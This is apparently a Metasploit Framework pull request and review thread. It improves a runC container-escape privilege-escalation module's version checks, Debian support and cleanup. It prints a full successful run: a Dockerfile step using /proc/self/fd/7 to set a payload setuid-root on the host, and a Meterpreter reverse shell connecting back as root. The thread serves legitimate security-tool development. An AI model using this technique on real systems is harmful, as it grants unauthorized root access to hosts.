Wider runC version support, add Debian, fix bugs.
rapid7/metasploit-framework pull request #18802
Opened 2024-02-07 06:12 UTC by SickMcNugget

updates #18780

Now uses the Gem::Version system to check the user's version of runC. The old system used to allow runC version 1.1.12 (which is patched). Now it allows from 1.0.0-rc93->1.1.11 (and I tested that it works as expected).

Support added for Debian as this was tested with both Debian and Ubuntu.

Newer versions of Docker wouldn't delete the built container due to the message format. I added a new regex to check for the message format which now deletes containers.

## Verification
- [x] Start `msfconsole`
- [x] `use exploit/linux/local/runc_cwd_priv_esc`
- [x] set SESSION <id>
- [x] set LHOST <lhost>
- [x] run
- [x] root shell acquired
- [x] Docker container deleted

## Output
- Regardless of whether ForceExploit was true or false, runC version 1.1.12 used to be treated as vulnerable, which this fixes. 
- Containers were not being deleted due to the output from docker engine below not meeting the regex expectations. 
- FD 7 has always been the correct descriptor so far in my experience, so I have set it as default.

### runC check
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run session=1 lhost=192.168.20.24 verbose=true

[*] Started reverse TCP handler on 192.168.20.24:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. runc 1.1.12 is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
```
### Valid run
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run session=1 lhost=192.168.20.24 verbose=true

[*] Started reverse TCP handler on 192.168.20.24:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable runc version 1.1.11 detected
[*] Creating directory /tmp/.jwBZNB
[*] /tmp/.jwBZNB created
[*] Uploading Payload to /tmp/.jwBZNB/.cleXu7
[*] Uploading Dockerfile to /tmp/.jwBZNB/Dockerfile
[*] Building from Dockerfile to set our payload permissions
[*] #0 building with "default" instance using docker driver
[*] 
[*] #1 [internal] load build definition from Dockerfile
[*] #1 transferring dockerfile: 217B done
[*] #1 DONE 0.0s
[*] 
[*] #2 [internal] load metadata for docker.io/library/alpine:latest
[*] #2 DONE 3.5s
[*] 
[*] #3 [internal] load .dockerignore
[*] #3 transferring context: 2B done
[*] #3 DONE 0.0s
[*] 
[*] #4 [1/3] FROM docker.io/library/alpine:latest@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
[*] #4 DONE 0.0s
[*] 
[*] #5 [2/3] WORKDIR /proc/self/fd/7
[*] #5 CACHED
[*] 
[*] #6 [3/3] RUN cd ../../../../../../../../ && chmod -R 777 tmp/.jwBZNB && chown -R root:root tmp/.jwBZNB && chmod u+s tmp/.jwBZNB/.cleXu7
[*] #6 DONE 0.3s
[*] 
[*] #7 exporting to image
[*] #7 exporting layers 0.0s done
[*] #7 writing image sha256:6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959 done
[*] #7 DONE 0.1s
[*] Removing created docker image 6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959
[*] Deleted: sha256:6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959
[*] Payload permissions set, executing payload (/tmp/.jwBZNB/.cleXu7)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.20.25
[+] Deleted /tmp/.jwBZNB/.cleXu7
[+] Deleted /tmp/.jwBZNB/Dockerfile
[+] Deleted /tmp/.jwBZNB
[*] Meterpreter session 2 opened (192.168.20.24:4444 -> 192.168.20.25:43178) at 2024-02-07 01:00:02 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.20.25
OS           : Debian 12.4 (Linux 6.1.0-17-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

2024-02-07 06:42 UTC, bcoles requested changes, later dismissed

2024-02-07 06:42 UTC, bcoles commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +    unless get_suid_files(payload_path).include?(payload_path)
Can we use `setuid?()` here?

```suggestion
    unless setuid?(payload_path)
```

`get_suid_files()` is unnecessary for a file path (as opposed to directory path) and brittle compared to `setuid?`.

2024-02-07 06:42 UTC, bcoles commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +      OptString.new('WRITABLEDIR', [ true, 'A directory where we can write and execute files', '/tmp' ]),
Is there a reason to change `WritableDir` to uppercase? `WritableDir` is standard across local exploitation modules.

If this option is changed it should also be changed in the associated module documentation.

2024-02-07 07:35 UTC, SickMcNugget commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +    unless get_suid_files(payload_path).include?(payload_path)
I've tested this change and added it in. I also thought the original statement was a bit odd, but I'm too inexperienced to have known about `setuid?`.

2024-02-07 07:36 UTC, SickMcNugget commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +      OptString.new('WRITABLEDIR', [ true, 'A directory where we can write and execute files', '/tmp' ]),
This is again due to inexperience. If it is a standard then it would make no sense for me to change it. Reverted.

2024-02-07 08:17 UTC, SickMcNugget commented
My commit and merge hooks were broken. Sorry about adding noise to the PR.

2024-02-07 10:51 UTC, cdelafuente-r7 commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
`Rex::Version` doesn't seem to support the format used by Ubuntu:
```
$ runc --version
runc version 1.1.7-0ubuntu1~20.04.2
spec: 1.0.2-dev
go: go1.18.1
libseccomp: 2.5.1
```
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run lhost=192.168.12.166 session=1 verbose=true lport=5555

[*] Started reverse TCP handler on 192.168.144.1:5555
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed: ArgumentError Malformed version number string 1.1.7-0ubuntu1~20.04.2
[*] Exploit completed, but no session was created.
```

2024-02-07 11:34 UTC, bcoles commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
The lazy option would be to split by `~`:

```ruby
irb(main):001> Gem::Version.new('1.1.7-0ubuntu1~20.04.2')
/usr/lib/ruby/vendor_ruby/rubygems/version.rb:223:in `initialize': Malformed version number string 1.1.7-0ubuntu1~20.04.2 (ArgumentError)
        from /usr/lib/ruby/vendor_ruby/rubygems/version.rb:206:in `new'
        from /usr/lib/ruby/vendor_ruby/rubygems/version.rb:206:in `new'
        from (irb):1:in `<main>'
        from /var/lib/gems/3.1.0/gems/irb-1.8.1/exe/irb:9:in `<top (required)>'
        from /usr/local/bin/irb:25:in `load'
        from /usr/local/bin/irb:25:in `<main>'
irb(main):002> Gem::Version.new('1.1.7-0ubuntu1~20.04.2'.split('~').first)
=> Gem::Version.new("1.1.7.pre.0ubuntu1")
```

(`Rex::Version` extends `Gem::Version`).

2024-02-07 11:59 UTC, SickMcNugget commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
I'm noticing now that the version for ubuntu noble (24.04) contains a `+` in it. For now I will add naive cases for both `~` and `+`, as both of them break the version check. I'm not seeing any other potential tokens yet, so I will stick to them unless we have additional suggestions.

2024-02-09 09:43 UTC, SickMcNugget commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
> +    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
Just realised that the if executable? check is wrong. It needs to be unless executable?, and the full path to runc needs to be passed otherwise it does not function as expected.

2024-02-09 10:18 UTC, h00die commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
>      end
I'm not a big fan of this change. Ubuntu detection is simple since there is only 1 release prior to patch for each vulnerable version. It's a very simple and accurate check without needing to manipulate anything. I think the Ubuntu check should stay, then if those fail, attempt to load it into `Rex::Version` for checking. This keeps the simplicity and accuracy from before, while also allowing for later checks of compiled versions later.

2024-02-09 13:13 UTC, closed without merging

2024-02-15 08:43 UTC, SickMcNugget commented on modules/exploits/linux/local/runc_cwd_priv_esc.rb
>      end
I've reimplemented the Ubuntu package checks before the new one. I'm not a fan of the token removal and personally I think turning the bad tokens into hyphens would be a better solution.